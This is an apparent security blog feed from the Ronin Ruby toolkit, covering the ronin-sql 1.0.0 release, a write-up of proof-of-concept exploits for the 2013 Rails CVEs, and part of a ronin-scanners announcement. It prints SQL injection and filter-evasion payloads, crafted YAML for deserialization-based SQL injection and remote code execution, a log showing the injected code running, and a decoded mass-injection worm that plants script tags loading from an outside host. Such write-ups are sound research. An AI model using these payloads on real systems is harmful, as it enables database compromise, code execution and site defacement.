<p>Bypass filters by using <code class="language-plaintext highlighter-rouge">/**/</code> instead of spaces:</p>
<figure class="highlight"><pre><code class="language-sql" data-lang="sql"><span class="mi">1</span><span class="cm">/**/</span><span class="k">UNION</span><span class="cm">/**/</span><span class="k">SELECT</span><span class="cm">/**/</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="n">id</span><span class="p">)</span><span class="cm">/**/</span><span class="k">FROM</span><span class="cm">/**/</span><span class="n">users</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">union</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="nb">id</span><span class="p">).</span><span class="nf">from</span><span class="p">(</span><span class="n">users</span><span class="p">)</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span><span class="p">.</span><span class="nf">to_sql</span><span class="p">(</span><span class="ss">:space</span> <span class="o">=></span> <span class="s1">'/**/'</span><span class="p">)</span>
<span class="c1"># 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users</span></code></pre></figure>
<p>Not too shabby!</p>
ronin-sql 1.0.0 released!2013-01-21 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2013/01/21/ronin-sql-1-0-0-released.html<p>After six years of development, and neglect, <a href="https://github.com/ronin-rb/ronin-sql#readme">ronin-sql</a> has been refactored
and version 1.0.0 has finally been released! <a href="https://github.com/ronin-rb/ronin-sql#readme">ronin-sql</a> is a library for
encoding/decoding SQL data. It also includes a Ruby Domain Specific Language
(DSL) for crafting complex <a href="http://en.wikipedia.org/wiki/SQL_injection">SQL Injections (SQLi)</a>.</p>
<h2 id="install">Install</h2>
<p><a href="https://github.com/ronin-rb/ronin-sql#readme">ronin-sql</a> is available for installation as a <a href="https://rubygems.org/gems/ronin-sql">RubyGem</a>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem install ronin-sql
</code></pre></div></div>
<h2 id="whats-new">What’s New?</h2>
<h3 id="ruby-19">Ruby 1.9</h3>
<p><a href="https://github.com/ronin-rb/ronin-sql#readme">ronin-sql</a> 1.0.0 requires Ruby >= 1.9.1. Ruby 1.8.7 is about to reach
<a href="https://blog.engineyard.com/2012/ruby-1-8-7-and-ree-end-of-life/">End-Of-Life</a> and it’s becoming difficult to develop for both 1.8 and
1.9. Additionally, Ruby 1.9 has many <a href="http://blog.newrelic.com/2012/10/23/eating-the-1-9-elephant/">performance improvements</a> over
1.8.7. Ruby 1.9.3 can be installed via <a href="https://rvm.io/">RVM</a> or via <a href="http://www.ubuntu.com/">Ubuntu</a> / <a href="http://fedoraproject.org/">Fedora</a>
packages.</p>
<h3 id="convenience-methods">Convenience Methods</h3>
<p>The [String#sql_escape], [String#sql_encode], [String#sql_decode] have been
moved out of [ronin-support] and into <a href="https://github.com/ronin-rb/ronin-sql#readme">ronin-sql</a>.</p>
<p>Escape a String:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"O'Brian"</span><span class="p">.</span><span class="nf">sql_escape</span>
<span class="c1"># => "'O''Brian'"</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"O'Brian"</span><span class="p">.</span><span class="nf">sql_escape</span><span class="p">(</span><span class="ss">:double</span><span class="p">)</span>
<span class="c1"># => "\"O'Brian\""</span></code></pre></figure>
<p>Unescapes a SQL String:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"'O''Brian'"</span><span class="p">.</span><span class="nf">sql_unescape</span>
<span class="c1"># => "O'Briand"</span></code></pre></figure>
<p>Hex encode a String:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"/etc/passwd"</span><span class="p">.</span><span class="nf">sql_encode</span>
<span class="c1"># => "0x2f6574632f706173737764"</span></code></pre></figure>
<p>Hex decode a String:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">string</span> <span class="o">=</span> <span class="s2">"4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"</span>
<span class="n">string</span><span class="p">.</span><span class="nf">sql_decode</span>
<span class="c1"># => "DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''+['+@C+'] where '+@C+' not like ''%\"></title><script src=\"http://www0.douhunqn.cn/csrss/w.js\"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"</span></code></pre></figure>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"2f6574632f706173737764"</span><span class="p">.</span><span class="nf">sql_decode</span>
<span class="c1"># => "/etc/passwd"</span></code></pre></figure>
<p>Additionally, [String#sql_unescape] has been added:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="s2">"'O''Brian'"</span><span class="p">.</span><span class="nf">sql_unescape</span>
<span class="c1"># => "O'Brian"</span></code></pre></figure>
<h3 id="roninsql">Ronin::SQL</h3>
<p>The Ruby->SQL encoder has been refactored into into a fully-fledged <a href="https://github.com/rails/arel#readme">ARel</a>-like
Ruby DSL:</p>
<p>Injecting a <code class="language-plaintext highlighter-rouge">1=1</code> test into a String value:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="ss">:escape</span> <span class="o">=></span> <span class="ss">:string</span><span class="p">)</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="n">string</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="o">==</span> <span class="n">string</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1' OR '1'='1</span></code></pre></figure>
<p>Columns:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">and</span> <span class="p">{</span> <span class="n">admin</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1 AND admin=1</span></code></pre></figure>
<p>Clauses:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}.</span><span class="nf">limit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1 AND admin=1</span></code></pre></figure>
<p>Statements:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">union</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="nb">id</span><span class="p">).</span><span class="nf">from</span><span class="p">(</span><span class="n">users</span><span class="p">)</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1 UNION SELECT (1,2,3,4,id) FROM users</span></code></pre></figure>
<p>Filter evasion:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Injection</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">union</span> <span class="p">{</span> <span class="nb">select</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">,</span><span class="mi">4</span><span class="p">,</span><span class="nb">id</span><span class="p">).</span><span class="nf">from</span><span class="p">(</span><span class="n">users</span><span class="p">)</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span><span class="p">.</span><span class="nf">to_sql</span><span class="p">(</span><span class="ss">:space</span> <span class="o">=></span> <span class="s1">'/**/'</span><span class="p">)</span>
<span class="c1"># 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users</span></code></pre></figure>
Rails PoC exploits for CVE-2013-0156 and CVE-2013-01552013-01-09 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2013/01/09/rails-pocs.html<p><strong>TL;DR:</strong> Exploits are out, update Rails!</p>
<ul>
<li><a href="https://gist.github.com/4499017">rails_dos.rb</a></li>
<li><a href="https://gist.github.com/4499030">rails_jsonq.rb</a></li>
<li><a href="https://gist.github.com/4499032">rails_sqli.rb</a></li>
<li><a href="https://gist.github.com/4499206">rails_rce.rb</a></li>
</ul>
<p>On January 8th, Aaron Patterson announced <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ">CVE-2013-0156</a>,
multiple vulnerabilities in parameter parsing in Action Pack allowing attackers
to:</p>
<ul>
<li>Bypass Authentication systems</li>
<li>Inject Arbitrary SQL</li>
<li>Perform a Denial of Service (DoS)</li>
<li>Execute arbitrary code</li>
</ul>
<p>However, rumors of this vulnerability had been circulating on twitter as far
back as <a href="https://groups.google.com/forum/#!topic/rubyonrails-security/DCNTNp_qjFM">CVE-2012-5664</a>. Others also claimed to have <a href="www.reddit.com/r/netsec/comments/167c11/serious_vulnerability_in_ruby_on_rails_allowing/c7teov4">working PoC exploits</a>,
but would not release them for fear of the PoCs being used maliciously.
Naturally, I was interested in investigating the vulnerability.</p>
<p>It all started when <a href="http://phenoelit.org/blog/archives/2012/12/21/let_me_github_that_for_you/index.html">Phenoelit</a> discovered a vulnerability
in how authentication plugins (such as AuthLogic) pass parameters to
<code class="language-plaintext highlighter-rouge">find_by_*</code> methods. <a href="https://groups.google.com/forum/#!topic/rubyonrails-security/DCNTNp_qjFM">CVE-2012-5664</a> was then posted, stirring Twitter into
a frenzy. However, the possibility of exploitation was limited, as detailed
on the <a href="http://blog.phusion.nl/2013/01/03/rails-sql-injection-vulnerability-hold-your-horses-here-are-the-facts/">Phusion Corporate Blog</a>. Thus the hunt began.</p>
<h2 id="intro-to-params-in-rails">Intro to params in Rails</h2>
<p>Params are first parsed by <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/middleware/params_parser.rb">ActionDispatch::Middleware::ParamsParser</a>, which detects the MIME type of the request and parses the body
appropriately. By default <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/middleware/params_parser.rb">ParamsParser</a> only supports parsing XML and JSON
requests. After the request body is parsed, the resulting data is coerced
into a <a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/hash_with_indifferent_access.rb">HashWithIndifferentAccess</a>, ensuring all Hash keys are Strings.</p>
<p>Next, <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/http/parameters.rb">ActionDispatch::Http::Parameters</a> takes the parsed request
parameters and merges them with the path parameters. Note that the path
parameters are first merged into the request parameters, to ensure that the
request parameters cannot override the path parameters. Also note that when a
Hash is merged into a <a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/hash_with_indifferent_access.rb">HashWithIndifferentAccess</a>, all keys are converted to
Strings and all sub-Hashes converted to Indifferent ones. This ensures that
<code class="language-plaintext highlighter-rouge">params</code> contains no Symbol keys and cannot be passed to <code class="language-plaintext highlighter-rouge">find_by_*</code> methods;
despite what <a href="https://groups.google.com/forum/#!topic/rubyonrails-security/DCNTNp_qjFM">CVE-2012-5664</a> claims.</p>
<h2 id="xml-deserialization">XML Deserialization</h2>
<p>The Rails XML module (<a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/xml_mini.rb#L67">ActiveSupport::XmlMini</a>) supports deserializing
various primitives such as Integer, Symbol, String, Date, Time, etc. However,
<a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/xml_mini.rb#L67">XmlMini</a> also supports deserializing embedded YAML blobs. One might wonder,
why this would be a good idea? Apparently, to support <a href="http://web.archive.org/web/20071218105822/http://dev.rubyonrails.org/ticket/7502">serializing/deserializing
ActiveRecord models that contain serialized YAML</a>.</p>
<p>What can we do with this? Deserialize arbitrary Objects for Classes already
loaded by the Rails application.</p>
<h2 id="yaml">YAML</h2>
<p>When <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> parses <code class="language-plaintext highlighter-rouge">!ruby/object:MyClass</code> objects, it will call
<code class="language-plaintext highlighter-rouge">MyClass.allocate</code> which returns a blank uninitialized instances of <code class="language-plaintext highlighter-rouge">MyClass</code>.
Next, Psych will call <code class="language-plaintext highlighter-rouge">instance_variable_set</code> to set various instance variables.</p>
<p>Interestingly, <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> allows for arbitrary classes to be specified with
<code class="language-plaintext highlighter-rouge">!ruby/string</code> and <code class="language-plaintext highlighter-rouge">!ruby/hash</code> declarations:</p>
<figure class="highlight"><pre><code class="language-yaml" data-lang="yaml"><span class="kt">!ruby/hash:MyHashLikeClass</span>
<span class="na">key1</span><span class="pi">:</span> <span class="s">value1</span>
<span class="na">key2</span><span class="pi">:</span> <span class="s">value2</span></code></pre></figure>
<p>When <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> parses <code class="language-plaintext highlighter-rouge">!ruby/hash:Class</code>, it will actually call <code class="language-plaintext highlighter-rouge">#initialize</code>
and then call <code class="language-plaintext highlighter-rouge">#[]=</code> to populate the objects fields. This feature was
<a href="https://github.com/ruby/ruby/commit/8cd2bf072180a9f733ac06dbaa96f071ca8e8303">added</a>
sometime after Ruby 1.9.2.</p>
<h2 id="pocs">PoCs</h2>
<p>The Proof of Concept (PoC) exploits rely on abusing the <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> YAML parser
and how it allows specifying arbitrary classes for <code class="language-plaintext highlighter-rouge">!ruby/string</code> and
<code class="language-plaintext highlighter-rouge">!ruby/hash</code> YAML objects.</p>
<p>All of the following PoCs require the <a href="https://rubygems.org/gems/ronin-support">ronin-support</a> gem and licensed under
<a href="http://gplv3.fsf.org/">GPLv3</a>.</p>
<h3 id="symbol-dos">Symbol DoS</h3>
<p><a href="https://gist.github.com/4499017">rails_dos.rb</a></p>
<p>The Denial of Service vulnerability relies on the fact that even in Ruby 1.9
Symbols are not Garbage Collected. Even if <a href="https://github.com/rails/rails/blob/v3.2.10/activesupport/lib/active_support/hash_with_indifferent_access.rb">HashWithIndifferentAccess</a>
converts the Symbols to Strings, the Symbols will remain in memory.</p>
<p>All we have to do is repeatedly send requests containing unique Symbols.
To accomplish this we use the <a href="/docs/ronin-support/String.html#generate-class_method">String.generate</a> method to generate
alphabetic Symbol names of varying length.</p>
<h3 id="unsafe-query-generation-via-json">Unsafe Query Generation via JSON</h3>
<p><a href="https://gist.github.com/4499030">rails_jsonq.rb</a></p>
<p><a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/middleware/params_parser.rb">ActionDispatch::Middleware::ParamsParser</a> also supports parsing
JSON params from requests. However, it does not normalize the parsed params.
Values such as <code class="language-plaintext highlighter-rouge">[nil]</code> or <code class="language-plaintext highlighter-rouge">[""]</code> are not normalized to <code class="language-plaintext highlighter-rouge">nil</code> and <code class="language-plaintext highlighter-rouge">""</code>.
This allows us to bypass <code class="language-plaintext highlighter-rouge">#nil?</code> or <code class="language-plaintext highlighter-rouge">#empty?</code> checks, such as described
in <a href="https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/t1WFuuQyavI">CVE-2013-0155</a>:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="k">unless</span> <span class="n">params</span><span class="p">[</span><span class="ss">:token</span><span class="p">].</span><span class="nf">nil?</span>
<span class="n">user</span> <span class="o">=</span> <span class="no">User</span><span class="p">.</span><span class="nf">find_by_token</span><span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="ss">:token</span><span class="p">])</span>
<span class="n">user</span><span class="p">.</span><span class="nf">reset_password!</span>
<span class="k">end</span></code></pre></figure>
<h3 id="sql-injection">SQL Injection</h3>
<p><a href="https://gist.github.com/4499032">rails_sqli.rb</a></p>
<p>Knowing that we cannot simply craft a XML+YAML request containing the <code class="language-plaintext highlighter-rouge">:select</code>
option with some raw SQL, we have to look for an alternate code-path.
As the <a href="http://www.insinuator.net/2013/01/rails-yaml/">Insinuator</a> blog post points out, <code class="language-plaintext highlighter-rouge">find_by_*</code> methods can actually
accept <code class="language-plaintext highlighter-rouge">Arel::Node</code> objects! Potentially, we can inject any of the
<a href="https://github.com/rails/arel/tree/v3.2.10/lib/arel/nodes">Arel::Nodes</a>. The most promising of these is <a href="https://github.com/rails/arel/blob/v3.2.10/lib/arel/nodes/sql_literal.rb">Arel::Nodes::SqlLiteral</a>.
Unfortunately, calling <code class="language-plaintext highlighter-rouge">Arel::Nodes::SqlLiteral#to_yaml</code> does not work,
so we must hand craft specific YAML:</p>
<figure class="highlight"><pre><code class="language-yaml" data-lang="yaml"><span class="nn">---</span> <span class="kt">!ruby/string:Arel::Nodes::SqlLiteral</span> <span class="s2">"</span><span class="s">SQL</span><span class="nv"> </span><span class="s">here"</span></code></pre></figure>
<p>Note that since <a href="https://github.com/rails/arel/blob/v3.2.10/lib/arel/nodes/sql_literal.rb">Arel::Nodes::SqlLiteral</a> inherits from String,
<code class="language-plaintext highlighter-rouge">!ruby/object:Arel::Nodes::SqlLiteral</code> actually deserializes to a plain String;
thus <code class="language-plaintext highlighter-rouge">!ruby/string</code> is necessary.</p>
<p>We could get creative and inject in an Abstract Syntax Tree (AST) of our
desired SQL:</p>
<figure class="highlight"><pre><code class="language-yaml" data-lang="yaml"><span class="nn">---</span> <span class="kt">!ruby/object:Arel::Nodes::Or</span>
<span class="na">left</span><span class="pi">:</span> <span class="m">0</span>
<span class="na">right</span><span class="pi">:</span> <span class="kt">!ruby/object:Arel::Nodes::Equality</span>
<span class="na">left</span><span class="pi">:</span> <span class="m">1</span>
<span class="na">right</span><span class="pi">:</span> <span class="s">1</span></code></pre></figure>
<h3 id="remote-code-execution">Remote Code Execution</h3>
<p><a href="https://gist.github.com/4499206">rails_rce.rb</a></p>
<p><strong>Update:</strong> The RCE PoC has been updated to support Rails 3.x and 2.x.
Also, <a href="https://gist.github.com/4499206/#comment-718470">@eric1234</a> discovered
that RCE PoC will not work against Ruby 1.9.2 below, due to Psych <= 1.0.0
not allowing arbitrary classes with <code class="language-plaintext highlighter-rouge">!ruby/hash</code>. However, there
may be other YAML encoding tricks that could trigger the vulnerability.</p>
<p>As discussed in this <a href="http://www.insinuator.net/2013/01/rails-yaml/">Insinuator</a> blog post, it may be possible to override an
instance variable that is later passed to <code class="language-plaintext highlighter-rouge">instance_eval</code>, <code class="language-plaintext highlighter-rouge">class_eval</code>,
<code class="language-plaintext highlighter-rouge">module_eval</code> or <code class="language-plaintext highlighter-rouge">send</code>. One such example is using <a href="http://rubydoc.info/stdlib/erb/ERB">ERB</a>:</p>
<figure class="highlight"><pre><code class="language-yaml" data-lang="yaml"><span class="nn">---</span> <span class="kt">!ruby/object:ERB</span>
<span class="na">src</span><span class="pi">:</span> <span class="s">_erbout = puts 'lol'</span></code></pre></figure>
<p>However, this relies on Rails calling <code class="language-plaintext highlighter-rouge">#run</code> or <code class="language-plaintext highlighter-rouge">#result</code>. This turns out to be
rather difficult, since ActiveRecord/Arel will only allow certain types of
objects be passed to <code class="language-plaintext highlighter-rouge">find_by_*</code> methods.</p>
<p>Since, we know <a href="https://github.com/tenderlove/psych/blob/v3.2.10/lib/psych/visitors/to_ruby.rb">Psych</a> will call <code class="language-plaintext highlighter-rouge">#initialize</code> when parsing <code class="language-plaintext highlighter-rouge">!ruby/hash:MyClass</code>
we just need to find a Hash like class. Luckily an anonymous contributor
discovered such a class and told the Metasploit developers, which got published
on the <a href="https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156">Rapid7 Community</a> blog. The blog post then circulated Twitter and
a friend pointed me to the class.</p>
<p><strong>Update:</strong> After publishing the PoCs, <a href="https://github.com/lian">lian</a> contacted me and
identified himself as the anonymous contributor who told HD Moore about the
class. I then convinced him to take credit for his work on this vulnerability.
Thanks to <a href="https://github.com/lian">lian</a>’s solution, I was able to finish writing the exploit.
In my opinion, if you give a famous Security Research your own research,
you should publish it yourself to receive proper recognition and inform
us not-so-famous Security researchers. ;)</p>
<p>The class in question is <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/routing/route_set.rb#L96">ActionDispatch::Routing::RouteSet::NamedRouteCollection</a>.
The class initializes variables in <code class="language-plaintext highlighter-rouge">#initialize</code> and aliases <code class="language-plaintext highlighter-rouge">#[]=</code> to the
<code class="language-plaintext highlighter-rouge">add</code> method. The <code class="language-plaintext highlighter-rouge">add</code> method then leads to <code class="language-plaintext highlighter-rouge">define_named_route_methods</code>,
which leads to <code class="language-plaintext highlighter-rouge">define_named_route_methods</code>, then to <code class="language-plaintext highlighter-rouge">define_url_helper</code>
and finally <code class="language-plaintext highlighter-rouge">module_eval</code>. We are in business.</p>
<p>Now to figure out how to escape our Ruby code, such that <code class="language-plaintext highlighter-rouge">def #{name}</code> is
ignored. Luckily, Ruby provides a special keyword (<code class="language-plaintext highlighter-rouge">__END__</code>) which causes the
remainder of Ruby code to be treated as inline data.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="n">code</span> <span class="o">=</span> <span class="s2">"puts 'lol'"</span>
<span class="n">escaped_code</span> <span class="o">=</span> <span class="s2">"foo; </span><span class="si">#{</span><span class="n">code</span><span class="si">}</span><span class="se">\n</span><span class="s2">__END__</span><span class="se">\n</span><span class="s2">"</span></code></pre></figure>
<p>Now we need a convincing <code class="language-plaintext highlighter-rouge">route</code> Object for <a href="https://github.com/rails/rails/blob/v3.2.10/actionpack/lib/action_dispatch/routing/route_set.rb#L187-L203">define_url_helper</a>. Inspecting
the method, our <code class="language-plaintext highlighter-rouge">route</code> must respond to <code class="language-plaintext highlighter-rouge">defaults</code>, <code class="language-plaintext highlighter-rouge">requirements</code>,
<code class="language-plaintext highlighter-rouge">required_parts</code>, <code class="language-plaintext highlighter-rouge">segment_keys</code>. Luckily, all of these methods appear
to be reader methods, so we can mock up a <code class="language-plaintext highlighter-rouge">route</code> using an <a href="http://rubydoc.info/stdlib/ostruct/OpenStruct">OpenStruct</a>.</p>
<p>After some massaging of the YAML, victory! In fact, our method worked
so well that no exceptions were raised and our code is evaluated for each
url helper that is defined (four times):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>lol
lol
lol
lol
Started POST "/secrets/search" for 127.0.0.1 at 2013-01-09 19:35:48 -0800
Processing by SecretsController#search as */*
Parameters: {"secret"=>#<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0x007f5474264218 @routes={:"foo; puts 'lol'\n__END__\n"=>#<OpenStruct defaults={:action=>"create", :controller=>"foos"}, required_parts=[], requirements={:action=>"create", :controller=>"foos"}, segment_keys=[:format]>}, @helpers=[:"hash_for_foo; puts 'lol'\n__END__\n_url", :"foo; puts 'lol'\n__END__\n_url", :"hash_for_foo; puts 'lol'\n__END__\n_path", :"foo; puts 'lol'\n__END__\n_path"], @module=#<Module:0x007f54742641a0>>}
WARNING: Can't verify CSRF token authenticity
Completed 500 Internal Server Error in 1ms
</code></pre></div></div>
ronin-scanners 1.0.0.pre1 released!2012-10-08 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2012/10/08/ronin-scanners-1-0-0-pre1-released.html<p>After much stressing over API design and refactoring <a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a> 1.0.0.pre1
has been released. <a href="https://rubygems.org/gems/ronin-scanners/versions/1.0.0.pre1">1.0.0.pre1</a> is a complete rewrite of ronin-scanners
when compared to <a href="https://rubygems.org/gems/ronin-scanners/versions/0.1.4">0.1.4</a>; released back in 2009. The new API for
<a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a> now allows for developers to write Scanners in Ruby and have
their results automatically imported into the Ronin Database! This new API
opens the door for quickly pulling data off the internet and into Ronin.</p>
<h2 id="install">Install</h2>
<p><a href="https://github.com/ronin-rb/ronin-scanners#readme">ronin-scanners</a> 1.0.0.pre1 can be installed from <a href="https://rubygems.org/gems/ronin-scanners/versions/1.0.0.pre1">rubygems.org</a>
like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ gem install ronin-scanners --pre
</code></pre></div></div>
<h2 id="api">API</h2>
<p>All Ronin Scanners inherit from the <a href="/docs/ronin-scanners/Ronin/Scanners/Scanner.html">Ronin::Scanners::Scanner</a> base class.</p>
<p>For a Scanner to be a functioning scanner, it must define a <code class="language-plaintext highlighter-rouge">scan</code> method.
The <code class="language-plaintext highlighter-rouge">scan</code> method performs the actual “scanning” and yields each result.
A result from a Scanner can be any kind of Object;
whatever makes the most sense for a particular Scanner.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="k">def</span> <span class="nf">scan</span>
<span class="n">sitemap</span> <span class="o">=</span> <span class="no">Nokogiri</span><span class="o">::</span><span class="no">XML</span><span class="p">(</span><span class="n">http_get_body</span><span class="p">(</span><span class="ss">:path</span> <span class="o">=></span> <span class="no">SITEMAP_PATH</span><span class="p">))</span>
<span class="n">sitemap</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="s1">'/urlset/url/loc/.'</span><span class="p">).</span><span class="nf">each</span> <span class="k">do</span> <span class="o">|</span><span class="n">url</span><span class="o">|</span>
<span class="k">yield</span> <span class="n">url</span>
<span class="k">end</span>
<span class="k">end</span></code></pre></figure>
<h3 id="parameters">Parameters</h3>
<p>Since the <code class="language-plaintext highlighter-rouge">scan</code> method takes no arguments, Scanners are configured by the
parameters they define.</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="c1"># The URL to start spidering at.</span>
<span class="n">parameter</span> <span class="ss">:start_at</span><span class="p">,</span> <span class="ss">:description</span> <span class="o">=></span> <span class="s1">'The URI to start scanning at'</span>
<span class="c1"># The hosts to spider.</span>
<span class="n">parameter</span> <span class="ss">:hosts</span><span class="p">,</span> <span class="ss">:default</span> <span class="o">=></span> <span class="no">Set</span><span class="p">[],</span>
<span class="ss">:description</span> <span class="o">=></span> <span class="s1">'The hosts to scan'</span></code></pre></figure>
<h3 id="results">Results</h3>
<p>Many Scanners will likely invoke third-party scanners, and the returned
results may not always be so consistent. For this, one can define a
<code class="language-plaintext highlighter-rouge">normalize_result</code> method:</p>
<figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="k">def</span> <span class="nf">normalize_result</span><span class="p">(</span><span class="n">result</span><span class="p">)</span>
